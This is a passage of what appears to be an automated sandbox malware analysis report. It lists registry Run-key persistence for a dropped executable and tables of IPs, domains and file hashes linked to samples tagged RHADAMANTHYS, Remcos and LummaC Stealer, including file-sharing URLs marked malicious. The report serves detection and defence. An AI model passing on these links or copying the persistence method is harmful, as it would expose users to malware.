                                                                                                                                                                                                          17:41:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                                          17:42:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
                                                                                                                                                                                                          17:42:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          162.125.65.15qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                            pay.batGet hashmaliciousKimsukyBrowse
                                                                                                                                                                                                              protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                https://www.dropbox.com/l/AADw7QsXXUEgtGMTkaD6s_noiLvCBcZslDg/downloadingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  35N4PXWcmC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    162.159.61.3qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                      Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                          https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  FW_ _Reminder_ Membership Credit Verification - TPIS Industrial Services_ LLC.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    SADP.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                        162.125.69.18Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                            zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                  kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                    7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                      kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                        https://docsend.com/view/nw5cttresp36nsvcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            162.125.69.15qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                    zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            Rechnung-Kfz.lnkGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              chrome.cloudflare-dns.comqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.apptaCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              edge-block-www-env.dropbox-dns.comqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              fg.microsoft.map.fastly.nettaCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                              EgnyteDesktopApp_3.17.1_144.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                              sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                              oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                              9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                              4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                              Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                              098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                              loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 199.232.214.172

                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              DROPBOXUSqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              DROPBOXUSqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              DROPBOXUSqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                              • 162.125.69.18

                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              xrv3PCeWDV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              qKIpxnvEyJ.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                              3PALEJZmqL.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                              • 162.125.69.15

                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\854113748.exeqxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse

                                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3275306050965938
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrD:KooCEYhgYEL0In
                                                                                                                                                                                                                                                                                  MD5:2C8714B0E58093309323D7EC8E2F3F14
                                                                                                                                                                                                                                                                                  SHA1:93A4CB34D613227D77BE9A396AADCD663A5C9CC7
                                                                                                                                                                                                                                                                                  SHA-256:288BBA991F693D7C18437AAE6FA55D1642912A33989E90754A21874484D4D552
                                                                                                                                                                                                                                                                                  SHA-512:36D8A56CA2370BA86C26431F8ED286F6F3789948FDBCF62AB7BB3C205CF938E7BD5B78C32A2A020DBBBD2061A63974D3104C4625A2D49DFB92EF5813DBD7C8DE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x77f787f5, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.422176101403095
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                                                  MD5:D37865A7471DC88B9E679189ADF8294A
                                                                                                                                                                                                                                                                                  SHA1:E73CFACB9F7DB2C620807841378CA46241AF40AD
                                                                                                                                                                                                                                                                                  SHA-256:6A9E729162F4F6F1F547BF0CF74F9C69136F54A3A117397EC1C36F3C125A725E
                                                                                                                                                                                                                                                                                  SHA-512:16D932F3E6AAC194F9D93CF0159DA8A007720EA522669AE0E6B5EC76884CED6FED6ADA40B38374B526DFA744859B283961B3DD53430E4F8F218B4CA47854150C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:w...... .......A.......X\...;...{......................0.!..........{A..)...|e.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................P.q..)...|}.................r..\.)...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07666993211325662
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:NGl/yYeOlpZ0hajn13a/P55zal/ollcVO/lnlZMxZNQl:syzaZ0ha53qLuAOewk
                                                                                                                                                                                                                                                                                  MD5:370B9BC900B3CEF31F8A152250C3F1B4
                                                                                                                                                                                                                                                                                  SHA1:365E1418EF87F3523D4B9C28541ADFBD6CACA1A6
                                                                                                                                                                                                                                                                                  SHA-256:8B26E2D8A692272B5E0D65D5BD7C031AB77D7D1886A07135F6FA87FF16D1494F
                                                                                                                                                                                                                                                                                  SHA-512:FCAC0155A9F8E92EB0E2DBF9A9BE0BCFD1F54E3F58A2432AFF35BDD1562FF74E6585C5C97B155490BC08F189ADEB1D0E106B8060BD91898811E1512106F0D69A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:A..^.....................................;...{...)...|.......{A..............{A......{A..........{A]................r..\.)...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_5d860d82-9311-438e-aaeb-90aad6a8029f\Report.wer

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6602034859718899
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:ankFqg3elHqigKJtts3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZA7:rQwaHnttxR0apYKjqzuiFcZ24lO8JO
                                                                                                                                                                                                                                                                                  MD5:ED02B9464638F9BDF533AB10246EF2A7
                                                                                                                                                                                                                                                                                  SHA1:1AFA25D81ACB4506939369D539F410BC69AF76A7
                                                                                                                                                                                                                                                                                  SHA-256:331721FB5227360B10B384FF6ACF52FDCC6DB85DBB7739B5CE2092A18C5D1128
                                                                                                                                                                                                                                                                                  SHA-512:F59A890DC8450E6C78E6BDD3A37367F521741515692BE748DCF6CD0E975E9A590E6A14516102847771D2124E4C318B7FCAEBEFB15C77C625BC64F435C9337AB9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.6.1.4.7.1.5.2.9.2.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.6.1.4.7.7.4.5.2.4.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.8.6.0.d.8.2.-.9.3.1.1.-.4.3.8.e.-.a.a.e.b.-.9.0.a.a.d.6.a.8.0.2.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.5.c.1.9.d.5.-.d.7.9.d.-.4.b.f.e.-.8.2.8.2.-.a.a.b.4.1.a.a.8.f.7.8.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.0.-.0.0.0.1.-.0.0.1.4.-.0.a.c.c.-.7.f.d.e.2.a.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER707D.tmp.dmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 17:42:27 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):46742
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3023349648653901
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:5m8Ggr2DPbRcFjIyKQM7i7kTAc1T0PAq7NPwd2EGxWIFzIoqX:r9rEPU9COk9d0PAqh82EG3g
                                                                                                                                                                                                                                                                                  MD5:1D7AA1B126B114F790145384EEACFA47
                                                                                                                                                                                                                                                                                  SHA1:A5A10B406D2F05B25AD34388834221486CC1035C
                                                                                                                                                                                                                                                                                  SHA-256:06C1A8EEB2409769CF62A3AA41C71437CC638821E239C772C2DF75C8671B67A4
                                                                                                                                                                                                                                                                                  SHA-512:F02064FCB11139B065F8D0E007E60DC799110058F6122A2E6BB4BC94565193637C16B08D273994DB5C8BCFAC38B9310391416A318BC76276DBE978302A5858D5
                                                                                                                                                                                                                                                                                  Malicious:false
